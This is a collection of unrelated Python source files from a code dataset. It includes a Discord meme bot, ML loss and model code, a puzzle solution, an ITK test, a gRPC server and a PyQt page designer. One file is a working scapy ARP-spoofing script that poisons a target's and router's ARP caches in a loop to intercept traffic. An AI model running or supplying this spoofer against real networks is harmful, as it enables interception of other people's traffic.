'https://tenor.com/view/monkey-laughing-lol-laughing-hysterically-gif-17632955',
'https://cdn.discordapp.com/attachments/638718958819606549/749243434673635359/85635abe435992f4abf56c529f4b2be7.png',
'https://tenor.com/view/boat-monkey-driving-monkey-monkey-driving-boat-funny-monkey-gif-5232687']
await ctx.send(random.choice(saru) )
await ctx.message.delete()
@commands.command()
async def gorilla(self,ctx):
"""ローリングゴリラ"""
spingorilla = ['https://media1.tenor.com/images/d6efcdae8517b3f840b825171799b862/tenor.gif?itemid=17292343','https://media1.tenor.com/images/7986eaf1e2c4adcec62bb2276c18ddf4/tenor.gif?itemid=16499669']
await ctx.send(random.choice(spingorilla) )
await ctx.message.delete()
@commands.command()
async def howa(self,ctx):
"""ほわさんを呼び出す"""
howa = ['https://gyazo.com/2e64e20055545d61110c008050a8a016','https://gyazo.com/8d95c633faaf0a589631241d2274703f',
'https://gyazo.com/3e655e7f91e586737bdd22e3d2964dcc','https://gyazo.com/572820a2a4a350187563528143aa1f28',
'https://gyazo.com/b17a7733d777762ba75a3c9ed8bd9a47','https://media.discordapp.net/attachments/628175073504788491/748931562325803038/image0.png',
'https://cdn.discordapp.com/attachments/628175073504788491/749234343838351462/howa_1.png',
'https://gyazo.com/63c7a98e1657a7788a15c915604eb730',
'https://cdn.discordapp.com/attachments/628175073504788491/749234943447793674/2020-08-29_5.png',
'https://i.gyazo.com/thumb/1200/db0d354a6db0f23d5551bf2e4bfb1efb-png.jpg','https://gyazo.com/c2d098590fe775ee921fce983d72e2e4',
'https://gyazo.com/dee2d094a1ad9a89fee2012c38248783','https://gyazo.com/4d5dd57a27255343f2310c999c0e1261',
'https://gyazo.com/a01dd357ce772dae25305dd9700f5377']
await ctx.send(ctx.message.author.name + 'が <@!260693854070505472> 様を呼んでいるよ! \n ' + random.choice(howa) )
await ctx.message.delete()
@commands.command()
async def sarunokuruma(self,ctx):
"""さるさんが以前乗っていたくるま"""
await ctx.send('https://img.gifmagazine.net/gifmagazine/images/3083728/original.gif' )
await ctx.message.delete()
@commands.command()
async def ritoriri(self,ctx):
"""リトルリリカルの星6UB"""
await ctx.send('https://cdn.discordapp.com/attachments/668715128627396640/749213006784888842/image0.png' )
await ctx.message.delete()
@commands.command()
async def madoka(self,ctx):
"""お前樋口円香わかってなさすぎるだろ"""
await ctx.send('https://media.discordapp.net/attachments/668715128627396640/749213459954270208/image0.jpg' )
await ctx.message.delete()
@commands.command()
async def kuritorisu(self,ctx):
"""クリスマストリスターナ"""
await ctx.send('https://gyazo.com/c5a65d91fd08167cc4aabeea55b047fc' )
await ctx.message.delete()
@commands.command()
async def waruine(self,ctx):
"""わるいね収容者リスト"""
await ctx.send('https://twitter.com/i/lists/1227212620387643392' )
await ctx.message.delete()
@commands.command()
async def sarurage(self,ctx):
"""さるさんがおこった"""
await ctx.send('https://www.youtube.com/watch?v=GhxqIITtTtU' )
await ctx.message.delete()
@commands.command()
async def gemagema(self,ctx):
"""社会不適合者"""
await ctx.send('https://discordapp.com/channels/620957163992383500/638718958819606549/791677634127200307' )
await ctx.message.delete()
@commands.command()
async def sime(self,ctx):
"""〆"""
await ctx.send('https://cdn.discordapp.com/attachments/668715128627396640/749583481121669120/EglWTaVVgAEIIBG.png' )
await ctx.message.delete()
@commands.command()
async def gyouza(self,ctx):
"""ぎょうさ"""
await ctx.send('https://cdn.discordapp.com/attachments/638718958819606549/749650658784837753/E9A483E5AD90E38391E383AAE38383E381A8E38195E3819BE3819FE3818FE381A601.png' )
await ctx.message.delete()
@commands.command()
async def gacha(self,ctx):
"""ガチャシミュレータ"""
gacha = ['10','20','30','40','50','60','70','80','90','100','110','120','130','140','150','160','170','180','190','200','210','220','230','240','250','260','270','280','290','300']
await ctx.send(ctx.message.author.name + 'は' + random.choice(gacha) + '連で出ます' )
await ctx.message.delete()
@commands.command()
async def gachapopimasa(self,ctx):
"""ガチャシミュレータ"""
await ctx.send('ぽぴまさは単発で出ます' )
await ctx.message.delete()
class Game(commands.Cog, name = 'おもちゃ'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def uranai(self,ctx):
"""占い"""
#レスポンスされる運勢のリストを作成
unsei = ["大吉", "中吉", "吉", "末吉", "小吉", "凶", "大凶"]
choice = random.choice(unsei) #randomモジュールでunseiリストからランダムに一つを選出
await ctx.send(choice)
@commands.command()
async def janken(self,ctx):
"""じゃんけん"""
#レスポンスされる運勢のリストを作成
janken = ["<:31lolgoo:666949640955887628>", "✌️ ", "🖐️"]
choice = random.choice(janken) #randomモジュールでunseiリストからランダムに一つを選出
await ctx.send(choice)
bot = commands.Bot(command_prefix=prefix)
bot.add_cog(SkillMotionGIF(bot=bot))
bot.add_cog(DamageCalc(bot=bot))
bot.add_cog(BestUrl(bot=bot))
bot.add_cog(Game(bot=bot))
bot.run(token)
|
StarcoderdataPython
|
229961
|
from torch.nn import CrossEntropyLoss
from torch.nn.functional import nll_loss, log_softmax
class LabelSmoothingCrossEntropy(CrossEntropyLoss):
def __init__(self, eps: float = 0.1, *args, **kwargs):
super().__init__(*args, **kwargs)
self.eps = eps
def forward(self, output, target):
c = output.size()[-1]
log_preds = log_softmax(output, dim=-1)
if self.reduction == 'sum':
loss = -log_preds.sum()
else:
loss = -log_preds.sum(dim=-1)
if self.reduction == 'mean':
loss = loss.mean()
nl = nll_loss(log_preds, target, reduction=self.reduction)
return loss * self.eps / c + (1 - self.eps) * nl
__all__ = ['LabelSmoothingCrossEntropy']
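# Minimal smoke test (illustrative only; the tensors below are made up):
if __name__ == '__main__':
    import torch
    criterion = LabelSmoothingCrossEntropy(eps=0.1)
    logits = torch.randn(4, 10)          # batch of 4 samples, 10 classes
    target = torch.tensor([1, 0, 3, 9])  # ground-truth class indices
    print(criterion(logits, target))     # prints a scalar loss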
|
StarcoderdataPython
|
6653950
|
<gh_stars>0
"""Advent of Code 2017 Day 4."""
def main(file_input='input.txt'):
passphrases = [line.strip().split()
for line in get_file_contents(file_input)]
validators = (
('no duplicates', no_duplicates),
('no anagrams', no_anagrams),
)
for description, validator in validators:
valid_passphrases = validate_passphrases(passphrases, validator)
print(f'Valid passphrases with rule {description}: '
f'{len(valid_passphrases)}')
def validate_passphrases(passphrases, validator):
"""Validate passphrases with validator function."""
return [passphrase for passphrase in passphrases
if validator(passphrase)]
def no_anagrams(passphrase):
"""Checks if passphrase doesn't contain words that are anagrams."""
anagrams = set(''.join(sorted(word)) for word in passphrase)
return len(passphrase) == len(anagrams)
def no_duplicates(passphrase):
"""Checks if passphrase doesn't contain duplicated words."""
return len(passphrase) == len(set(passphrase))
def get_file_contents(file):
"""Read all lines from file."""
with open(file) as f:
return f.readlines()
if __name__ == '__main__':
main()
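# Example behaviour of the two validators (hypothetical passphrases):
#   no_duplicates(['aa', 'bb', 'aa'])  -> False ('aa' repeats)
#   no_duplicates(['aa', 'bb', 'cc'])  -> True
#   no_anagrams(['abc', 'cba'])        -> False ('abc' and 'cba' are anagrams)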
|
StarcoderdataPython
|
3544733
|
<reponame>tbirdso/ITKVkFFTBackend<gh_stars>0
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Verify that object factory initialization succeeds on itk module loading
# such that ITK VkFFT classes are instantiated as the default FFT image filter
# implementation through the object factory backend
import itk
itk.auto_progress(2)
real_type = itk.F
dimension = 3
real_image_type = itk.Image[real_type, dimension]
complex_image_type = itk.Image[itk.complex[real_type], dimension]
# Verify all FFT base filter types are instantiated with VkFFT accelerated backend
image_filter_list = [
(
itk.ComplexToComplex1DFFTImageFilter[complex_image_type],
itk.VkComplexToComplex1DFFTImageFilter[complex_image_type],
),
(
itk.ComplexToComplexFFTImageFilter[complex_image_type],
itk.VkComplexToComplexFFTImageFilter[complex_image_type],
),
(
itk.HalfHermitianToRealInverseFFTImageFilter[
complex_image_type, real_image_type
],
itk.VkHalfHermitianToRealInverseFFTImageFilter[complex_image_type],
),
(
itk.Forward1DFFTImageFilter[real_image_type],
itk.VkForward1DFFTImageFilter[real_image_type],
),
(
itk.ForwardFFTImageFilter[real_image_type, complex_image_type],
itk.VkForwardFFTImageFilter[real_image_type],
),
(
itk.Inverse1DFFTImageFilter[complex_image_type],
itk.VkInverse1DFFTImageFilter[complex_image_type],
),
(
itk.InverseFFTImageFilter[complex_image_type, real_image_type],
itk.VkInverseFFTImageFilter[complex_image_type],
),
(
itk.RealToHalfHermitianForwardFFTImageFilter[
real_image_type, complex_image_type
],
itk.VkRealToHalfHermitianForwardFFTImageFilter[real_image_type],
),
]
for (base_filter_type, vk_filter_type) in image_filter_list:
# Instantiate through the ITK object factory
image_filter = base_filter_type.New()
assert image_filter is not None
try:
print(
f"Instantiated default FFT image filter backend {image_filter.GetNameOfClass()}"
)
# Verify object can be cast to ITK VkFFT filter type
vk_filter_type.cast(image_filter)
except RuntimeError as e:
print(f"ITK VkFFT filter was not instantiated as default backend!")
raise e
|
StarcoderdataPython
|
3287303
|
# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) <NAME>, 2021
# All rights reserved
# @Author: '<NAME> <<EMAIL>>'
# @Time: '7/2/21 3:09 PM'
# 3p
from mask import Mask
from mask_prometheus import Prometheus
# project
from examples.protos.hello_pb2 import HelloResponse
app = Mask(__name__)
app.config["REFLECTION"] = True
app.config["DEBUG"] = True
app.config["PROMETHEUS_PORT"] = 18080
prometheus = Prometheus()
prometheus.init_app(app)
@app.route(method="SayHello", service="Hello")
def say_hello_handler(request, context):
""" Handler SayHello request
"""
return HelloResponse(message="Hello Reply: %s" % request.name)
@app.route(method="SayHelloStream", service="Hello")
def say_hello_stream_handler(request, context):
""" Handler stream SayHello request
"""
message = ""
for item in request:
message += item.name
yield HelloResponse(message="Hello Reply: %s" % item.name)
# return HelloResponse(message="Hello Reply: %s" % message)
if __name__ == "__main__":
app.run(port=1020)
|
StarcoderdataPython
|
213672
|
<reponame>sahin88/Python_Ethical_Hacking_Tools_Vulnerability_DDOS_PassSniffer
import scapy.all as scapy
import time
import termcolor
class ConnectToTarget:
def spoof(self,router_ip,target_ip,router_mac,target_mac ):
packet1=scapy.ARP(op=2, hwdst=router_mac,pdst=router_ip, psrc=target_ip)
packet2=scapy.ARP(op=2, hwdst=target_mac,pdst=target_ip, psrc=router_ip)
scapy.send(packet1)
scapy.send(packet2)
    def get_mac_address(self, ip_address):
broadcast_layer=scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_layer=scapy.ARP(pdst=ip_address)
get_mac_packet=broadcast_layer/arp_layer
answer=scapy.srp(get_mac_packet, timeout=2, verbose=False)[0]
return answer[0][1].hwsrc
def get_ip_and_route_address(self):
target_ip= input(termcolor.colored('[+] Target Ip Address:','yellow'))
        router_ip= input(termcolor.colored('[+] Router Ip Address: ','blue'))
target_mac=self.get_mac_address(target_ip)
router_mac=self.get_mac_address(router_ip)
try:
while True:
                self.spoof(router_ip,target_ip,router_mac,target_mac)
time.sleep(2)
except KeyboardInterrupt:
print("Closing ARP Spoofer")
connectTargetObject=ConnectToTarget()
connectTargetObject.get_ip_and_route_address()
|
StarcoderdataPython
|
5115573
|
<gh_stars>1-10
import numpy as np

# pre-allocate the result matrix (n is assumed to be defined elsewhere)
mat = np.zeros([n, 3])
for i in range(n):
mat[i][0] = ...
mat[i][1] = ...
mat[i][2] = ...
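# Equivalent sketch without the Python loop (hypothetical: assumes the three
# per-row values can be computed as whole arrays col0, col1, col2 of length n):
# mat = np.column_stack((col0, col1, col2))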
|
StarcoderdataPython
|
352979
|
import theano
import theano.tensor as T
from lasagne.layers import batch_norm, DenseLayer
from lasagne.nonlinearities import sigmoid, rectify, elu, tanh, identity, softmax
from lasagne.init import GlorotUniform, Constant, HeNormal
from lasagne.layers import Conv2DLayer, Pool2DLayer, MaxPool2DLayer, MaxPool1DLayer
from lasagne.layers import get_output, get_all_params, get_output_shape
from .base import BaseLasagneClassifier
from .blocks import resnet_block
class petrillo2017_classifier(BaseLasagneClassifier):
"""
Classifier based on deep cnn architecture.
"""
def __init__(self, **kwargs):
"""
Initialisation
"""
super(self.__class__, self).__init__(**kwargs)
def _model_definition(self, net):
"""
Builds the architecture of the network
"""
he_norm = HeNormal(gain='relu')
# Input filtering and downsampling with max pooling
net = batch_norm(Conv2DLayer(net, num_filters=32, filter_size=7, pad='same', nonlinearity=rectify, W=he_norm))
net = MaxPool2DLayer(net, 2)
net = batch_norm(Conv2DLayer(net, num_filters=64, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = MaxPool2DLayer(net, 2)
net = batch_norm(Conv2DLayer(net, num_filters=128, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = batch_norm(Conv2DLayer(net, num_filters=128, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = batch_norm(DenseLayer(net, num_units=1024, nonlinearity=rectify, W=he_norm))
net = batch_norm(DenseLayer(net, num_units=1024, nonlinearity=rectify, W=he_norm))
# Pooling
#net = MaxPool1DLayer(net, 1)
return net
|
StarcoderdataPython
|
1862265
|
#!/usr/bin/env python3
# -*- coding:utf8 -*-
import functools
import random
import sys
from PyQt5.QtCore import (QByteArray, QDataStream, QFile, QFileInfo,
QIODevice, QPoint, QPointF, QRectF, Qt)
from PyQt5.QtWidgets import (QApplication, QDialog,
QDialogButtonBox, QFileDialog, QFontComboBox,
QGraphicsItem, QGraphicsPixmapItem,
QGraphicsScene, QGraphicsTextItem, QGraphicsView, QGridLayout,
QHBoxLayout, QLabel, QMenu, QMessageBox,QPushButton, QSpinBox,
QStyle, QTextEdit, QVBoxLayout)
from PyQt5.QtGui import QFont,QCursor,QFontMetrics,QTransform,QPainter,QPen,QPixmap,QColor
from PyQt5.QtPrintSupport import QPrinter,QPrintDialog
MAC = True
try:
from PyQt5.QtGui import qt_mac_set_native_menubar
except ImportError:
MAC = False
PageSize = (595, 842) # A4 in points
# PageSize = (612, 792) # US Letter in points
PointSize = 10
MagicNumber = 0x70616765
FileVersion = 1
Dirty = False
class TextItemDlg(QDialog):
def __init__(self, item=None, position=None, scene=None, parent=None):
super(TextItemDlg, self).__init__(parent)
self.item = item
self.position = position
self.scene = scene
self.editor = QTextEdit()
self.editor.setAcceptRichText(False)
self.editor.setTabChangesFocus(True)
editorLabel = QLabel("&Text:")
editorLabel.setBuddy(self.editor)
self.fontComboBox = QFontComboBox()
self.fontComboBox.setCurrentFont(QFont("Times", PointSize))
fontLabel = QLabel("&Font:")
fontLabel.setBuddy(self.fontComboBox)
self.fontSpinBox = QSpinBox()
self.fontSpinBox.setAlignment(Qt.AlignRight|Qt.AlignVCenter)
self.fontSpinBox.setRange(6, 280)
self.fontSpinBox.setValue(PointSize)
fontSizeLabel = QLabel("&Size:")
fontSizeLabel.setBuddy(self.fontSpinBox)
self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok|
QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
if self.item is not None:
self.editor.setPlainText(self.item.toPlainText())
self.fontComboBox.setCurrentFont(self.item.font())
self.fontSpinBox.setValue(self.item.font().pointSize())
layout = QGridLayout()
layout.addWidget(editorLabel, 0, 0)
layout.addWidget(self.editor, 1, 0, 1, 6)
layout.addWidget(fontLabel, 2, 0)
layout.addWidget(self.fontComboBox, 2, 1, 1, 2)
layout.addWidget(fontSizeLabel, 2, 3)
layout.addWidget(self.fontSpinBox, 2, 4, 1, 2)
layout.addWidget(self.buttonBox, 3, 0, 1, 6)
self.setLayout(layout)
self.fontComboBox.currentFontChanged.connect(self.updateUi)
self.fontSpinBox.valueChanged.connect(self.updateUi)
self.editor.textChanged.connect(self.updateUi)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.setWindowTitle("Page Designer - {0} Text Item".format(
"Add" if self.item is None else "Edit"))
self.updateUi()
def updateUi(self):
font = self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
# void QFont::setPointSize(int pointSize)
self.editor.document().setDefaultFont(font)
# .document(): This property holds the underlying document of the text editor.
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(
bool(self.editor.toPlainText()))
def accept(self):
if self.item is None:
self.item = TextItem("", self.position, self.scene)
font = self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
self.item.setFont(font)
self.item.setPlainText(self.editor.toPlainText())
self.item.update()
# Schedules a redraw of the area covered by rect in this item.
# You can call this function whenever your item needs to be redrawn, such as if it changes appearance or size.
global Dirty
Dirty = True
QDialog.accept(self)
class TextItem(QGraphicsTextItem):
def __init__(self, text, position, scene,
font=QFont("Times", PointSize), matrix=QTransform()):
super(TextItem, self).__init__(text)
self.setFlags(QGraphicsItem.ItemIsSelectable|
QGraphicsItem.ItemIsMovable)
self.setFont(font)
self.setPos(position)
self.setTransform(matrix)
scene.clearSelection()
scene.addItem(self)
self.setSelected(True)
global Dirty
Dirty = True
def parentWidget(self):
return self.scene().views()[0]
def itemChange(self, change, variant):
if change != QGraphicsItem.ItemSelectedChange:
global Dirty
Dirty = True
return QGraphicsTextItem.itemChange(self, change, variant)
def mouseDoubleClickEvent(self, event):
        dialog = TextItemDlg(self, self.parentWidget())  # parentWidget() is used because, when invoked from a double-click, the item cannot act as the dialog's parent itself
dialog.exec_()
class GraphicsPixmapItem(QGraphicsPixmapItem): #add by yangrongdong
def __init__(self,pixmap):
super(GraphicsPixmapItem, self).__init__(pixmap)
class BoxItem(QGraphicsItem):
def __init__(self, position, scene, style=Qt.SolidLine,
rect=None, matrix=QTransform()):
        # required parameters: rectangle size, pen style, transform, position, and the scene to place the item in
        # QTransform(): constructs an identity matrix; it can also accept a matrix, a transform object, or points
super(BoxItem, self).__init__()
self.setFlags(QGraphicsItem.ItemIsSelectable|
QGraphicsItem.ItemIsMovable|
                      QGraphicsItem.ItemIsFocusable)  # selectable, movable, focusable
if rect is None:
rect = QRectF(-10 * PointSize, -PointSize, 20 * PointSize,
                          2 * PointSize)  # provide a default rectangle
self.rect = rect
self.style = style
self.setPos(position)
self.setTransform(matrix)
scene.clearSelection() # [slot] void QGraphicsScene::clearSelection() Clears the current selection.
        scene.addItem(self)  # add the item to the scene; it is selected and highlighted next (the scene is the receiving object)
self.setSelected(True) #If selected is true and this item is selectable, this item is selected; otherwise, it is unselected.
self.setFocus() #Gives keyboard input focus to this item. void QGraphicsItem::setFocus(Qt::FocusReason focusReason = Qt::OtherFocusReason)
# The focusReason argument will be passed into any focus event generated by this function;
global Dirty
        Dirty = True  # set Dirty to True to mark the change
def parentWidget(self):
return self.scene().views()[0]
# Returns a list of all the views that display this scene.
# QView.scene() Returns a pointer to the scene that is currently visualized in the view.
def boundingRect(self):
return self.rect.adjusted(-2, -2, 2, 2)
        # return an outer border rect; without the adjustment this would just be the (possibly flat) default box
def paint(self, painter, option, widget):
pen = QPen(self.style)
pen.setColor(Qt.black)
pen.setWidth(1)
if option.state & QStyle.State_Selected:
pen.setColor(Qt.blue)
painter.setPen(pen)
painter.drawRect(self.rect)
def itemChange(self, change, variant):
if change != QGraphicsItem.ItemSelectedChange:
global Dirty
Dirty = True
return QGraphicsItem.itemChange(self, change, variant)
def contextMenuEvent(self, event):
wrapped = []
menu = QMenu(self.parentWidget())
for text, param in (
("&Solid", Qt.SolidLine),
("&Dashed", Qt.DashLine),
("D&otted", Qt.DotLine),
("D&ashDotted", Qt.DashDotLine),
("DashDo&tDotted", Qt.DashDotDotLine)):
            wrapper = functools.partial(self.setStyle, param)  # not a bare setStyle call: the wrapper also handles repainting and the dirty flag, with the style baked in as a parameter
            # self.setStyle is passed without parentheses; param is bound as its argument
wrapped.append(wrapper)
menu.addAction(text, wrapper)
        menu.exec_(event.screenPos())  # screenPos/globalPos are global screen coordinates; windowPos can change as the window moves
        # QMouseEvent::pos() returns the position relative to this widget
        # QWidget::pos() gives the widget's position inside its parent window
        # QMouseEvent::screenPos() and globalPos() hold the same value, but screenPos() is a higher-precision QPointF; some widgets also provide globalPosF returning QPoint
def setStyle(self, style):
self.style = style
self.update()
global Dirty
Dirty = True
def keyPressEvent(self, event):
        # FIXME: why does this have no effect?
        factor = PointSize / 4  # movement step size
changed = False
if event.modifiers() & Qt.ShiftModifier:
if event.key() == Qt.Key_Left:
self.rect.setRight(self.rect.right() - factor)
# void QRect::setRight(int x) Sets the right edge of the rectangle to the given x coordinate
# May change the width, but will never change the left edge of the rectangle.
# moveRight() Moves the rectangle horizontally, leaving the rectangle's right edge at the given x coordinate. The rectangle's size is unchanged.
changed = True
elif event.key() == Qt.Key_Right:
self.rect.setRight(self.rect.right() + factor)
changed = True
elif event.key() == Qt.Key_Up:
self.rect.setBottom(self.rect.bottom() - factor)
changed = True
elif event.key() == Qt.Key_Down:
self.rect.setBottom(self.rect.bottom() + factor)
changed = True
if changed:
self.update()
global Dirty
Dirty = True
else:
QGraphicsItem.keyPressEvent(self, event)
class GraphicsView(QGraphicsView):
def __init__(self, parent=None):
super(GraphicsView, self).__init__(parent)
self.setDragMode(QGraphicsView.RubberBandDrag)
# A rubber band will appear. Dragging the mouse will set the rubber band geometry,
# and all items covered by the rubber band are selected. This mode is disabled for non-interactive views.
self.setRenderHint(QPainter.Antialiasing)
self.setRenderHint(QPainter.TextAntialiasing)
    def wheelEvent(self, event):
        #factor = 1.41 ** (-event.delta() / 240.0)
        # zoom in on wheel-up, zoom out on wheel-down
        factor = 2 if event.angleDelta().y() > 0 else 0.5
self.scale(factor, factor)
# Scales the current view transformation by (sx, sy).
class MainForm(QDialog):
def __init__(self, parent=None):
super(MainForm, self).__init__(parent)
self.filename = ""
self.copiedItem = QByteArray()
self.pasteOffset = 5
self.prevPoint = QPoint()
self.addOffset = 5
self.borders = []
self.printer = QPrinter(QPrinter.HighResolution)
# enum QPrinter::PrinterMode
        # HighResolution is one of the QPrinter::PrinterMode values
self.printer.setPageSize(QPrinter.A4)
self.view = GraphicsView()
self.scene = QGraphicsScene(self)
self.scene.setSceneRect(0, 0, PageSize[0], PageSize[1])
self.addBorders()
self.view.setScene(self.scene)
        # no need to call view.show()?
self.wrapped = [] # Needed to keep wrappers alive
buttonLayout = QVBoxLayout()
for text, slot in (
("Add &Text", self.addText),
("Add &Box", self.addBox),
("Add Pi&xmap", self.addPixmap),
("&Align", None),
("&Copy", self.copy),
("C&ut", self.cut),
("&Paste", self.paste),
("&Delete...", self.delete),
("&Rotate", self.rotate),
("Pri&nt...", self.print_),
("&Open...", self.open),
("&Save", self.save),
("&Quit", self.accept)):
button = QPushButton(text)
if not MAC:
button.setFocusPolicy(Qt.NoFocus)
if slot is not None:
button.clicked.connect(slot)
if text == "&Align":
menu = QMenu(self)
for text, arg in (
("Align &Left", Qt.AlignLeft),
("Align &Right", Qt.AlignRight),
("Align &Top", Qt.AlignTop),
("Align &Bottom", Qt.AlignBottom)):
wrapper = functools.partial(self.setAlignment, arg)
# ?????
self.wrapped.append(wrapper)
menu.addAction(text, wrapper)
button.setMenu(menu)
if text == "Pri&nt...":
buttonLayout.addStretch(5)
if text == "&Quit":
buttonLayout.addStretch(1)
buttonLayout.addWidget(button)
buttonLayout.addStretch()
layout = QHBoxLayout()
layout.addWidget(self.view, 1)
# QBoxLayout::addWidget(QWidget *widget, int stretch = 0, Qt::Alignment alignment = Qt::Alignment())
layout.addLayout(buttonLayout)
self.setLayout(layout)
fm = QFontMetrics(self.font())
self.resize(self.scene.width() + fm.width(" Delete... ") + 50,
self.scene.height() + 50)
self.setWindowTitle("Page Designer 页面设计器")
def addBorders(self):
        '''Add the bleed box and the print-margin box to the scene, and record them in the self.borders list'''
self.borders = []
rect = QRectF(0, 0, PageSize[0], PageSize[1])
self.borders.append(self.scene.addRect(rect, Qt.black)) # addRect px,py,x,y,QPen,QBrush or QRectF,QPen,QBrush
# scene.addRect(): Return QGraphicsRectItem;Inherits: QGraphicsItem
margin = 5.25 * PointSize
self.borders.append(self.scene.addRect(
rect.adjusted(margin, margin, -margin, -margin),
Qt.red))
def removeBorders(self):
        '''Remove the border rects from the list and from the scene'''
while self.borders:
item = self.borders.pop()
            self.scene.removeItem(item)  # removes the item and all its children from the scene; takes a QGraphicsItem
del item
def reject(self):
self.accept()
def accept(self):
self.offerSave()
        QDialog.accept(self)  # after offering to save, delegate to the QDialog parent class's accept (this MainForm is itself a QDialog)
def offerSave(self):
        '''Check Dirty for unsaved changes; if changed, show a save prompt and call save() on confirmation.'''
if (Dirty and QMessageBox.question(self,
"Page Designer - Unsaved Changes",
"Save unsaved changes?",
QMessageBox.Yes|QMessageBox.No) ==
QMessageBox.Yes):
self.save()
def position(self):
        point = self.mapFromGlobal(QCursor.pos())  # mapFromGlobal takes a QPoint and converts it to widget coordinates; the result is still a QPoint
        # Translates the global screen coordinate pos to widget coordinates.
        if not self.view.geometry().contains(point):  # cursor is outside the view: fall back to a random spot
coord = random.randint(36, 144)
point = QPoint(coord, coord)
else:
if point == self.prevPoint:
point += QPoint(self.addOffset, self.addOffset)
self.addOffset += 5
else:
self.addOffset = 5
self.prevPoint = point
        return self.view.mapToScene(point)  # convert the widget point to scene coordinates via the QGraphicsView
def addText(self):
dialog = TextItemDlg(position=self.position(),
scene=self.scene, parent=self)
dialog.exec_()
def addBox(self):
BoxItem(self.position(), self.scene)
def addPixmap(self):
        path = (QFileInfo(self.filename).path()
                if self.filename else ".")  # directory of the current file, or the program's working directory
fname,filetype = QFileDialog.getOpenFileName(self,
"Page Designer - Add Pixmap", path,
"Pixmap Files (*.bmp *.jpg *.png *.xpm)")
if not fname:
return
        self.createPixmapItem(QPixmap(fname), self.position())  # build a QPixmap from the chosen path and pass the insertion position
    def createPixmapItem(self, pixmap, position, matrix=QTransform()):  # parameters: pixmap, position and transform
        item = GraphicsPixmapItem(pixmap)  # step 1: wrap the QPixmap in a graphics item
        item.setFlags(QGraphicsItem.ItemIsSelectable|
                      QGraphicsItem.ItemIsMovable)  # make it selectable and movable
        item.setPos(position)  # set the position
        item.setTransform(matrix)  # apply the transform to the item
        self.scene.clearSelection()  # clear the current selection
        self.scene.addItem(item)  # add the item to the scene
        item.setSelected(True)  # and select it
        global Dirty
        Dirty = True  # set the global Dirty flag
        return item  # returned so readItemFromStream can set the rotation on the new item
    def selectedItem(self):  # selectedItems() returns a list; return the item when exactly one is selected, otherwise None
items = self.scene.selectedItems()
if len(items) == 1:
return items[0]
return None
def copy(self):
item = self.selectedItem()
if item is None:
return
self.copiedItem.clear()
self.pasteOffset = 5
stream = QDataStream(self.copiedItem, QIODevice.WriteOnly)
        self.writeItemToStream(stream, item)  # write the item to the stream
def cut(self):
item = self.selectedItem()
if item is None:
return
self.copy()
self.scene.removeItem(item)
del item
def paste(self):
if self.copiedItem.isEmpty():
return
stream = QDataStream(self.copiedItem, QIODevice.ReadOnly)
        self.readItemFromStream(stream, self.pasteOffset)  # read the item back from the stream, shifted by pasteOffset
self.pasteOffset += 5
def setAlignment(self, alignment):
# Items are returned in arbitrary order
items = self.scene.selectedItems()
if len(items) <= 1:
return
# Gather coordinate data
leftXs, rightXs, topYs, bottomYs = [], [], [], []
for item in items:
rect = item.sceneBoundingRect()
# Returns the bounding rect of this item in scene coordinates : Return QRectF
leftXs.append(rect.x())
rightXs.append(rect.x() + rect.width())
topYs.append(rect.y())
bottomYs.append(rect.y() + rect.height())
# Perform alignment
if alignment == Qt.AlignLeft:
xAlignment = min(leftXs)
for i, item in enumerate(items):
item.moveBy(xAlignment - leftXs[i], 0)
# void QGraphicsItem::moveBy(qreal dx, qreal dy)
# Moves the item by dx points horizontally, and dy point vertically.
elif alignment == Qt.AlignRight:
xAlignment = max(rightXs)
for i, item in enumerate(items):
item.moveBy(xAlignment - rightXs[i], 0)
elif alignment == Qt.AlignTop:
yAlignment = min(topYs)
for i, item in enumerate(items):
item.moveBy(0, yAlignment - topYs[i])
elif alignment == Qt.AlignBottom:
yAlignment = max(bottomYs)
for i, item in enumerate(items):
item.moveBy(0, yAlignment - bottomYs[i])
global Dirty
Dirty = True
def rotate(self):
for item in self.scene.selectedItems():
item.setRotation(item.rotation()+30)
    def delete(self):  # confirm with the user, then iteratively remove every selected item from the scene and set Dirty to True
items = self.scene.selectedItems()
if (len(items) and QMessageBox.question(self,
"Page Designer - Delete",
"Delete {0} item{1}?".format(len(items),
"s" if len(items) != 1 else ""),
QMessageBox.Yes|QMessageBox.No) ==
QMessageBox.Yes):
while items:
item = items.pop()
self.scene.removeItem(item)
del item
global Dirty
Dirty = True
def print_(self):
        # dialog = QPrintDialog(self.printer)  # self.printer (the QPrinter) is already configured; the dialog hands the
        # # same printer object back, so settings chosen in it would carry over to later use
# if dialog.exec_():
painter = QPainter(self.printer)
painter.setRenderHint(QPainter.Antialiasing)
painter.setRenderHint(QPainter.TextAntialiasing)
self.scene.clearSelection()
self.removeBorders()
self.scene.render(painter)
# [void] Renders the source rect from scene into target, using painter. This function is useful for capturing the contents
# of the scene onto a paint device, such as a QImage (e.g., to take a screenshot), or for printing with QPrinter. For example:
self.addBorders()
def open(self):
self.offerSave()
path = (QFileInfo(self.filename).path()
if self.filename else ".")
fname,filetype = QFileDialog.getOpenFileName(self,
"Page Designer - Open", path,
"cmPage Designer Files (*.cmpd *.pgd *.cmd)")
if not fname:
return
self.filename = fname
fh = None
try:
fh = QFile(self.filename)
if not fh.open(QIODevice.ReadOnly):
raise IOError(str(fh.errorString()))
            items = self.scene.items()  # returns every QGraphicsItem in the scene as a list
while items:
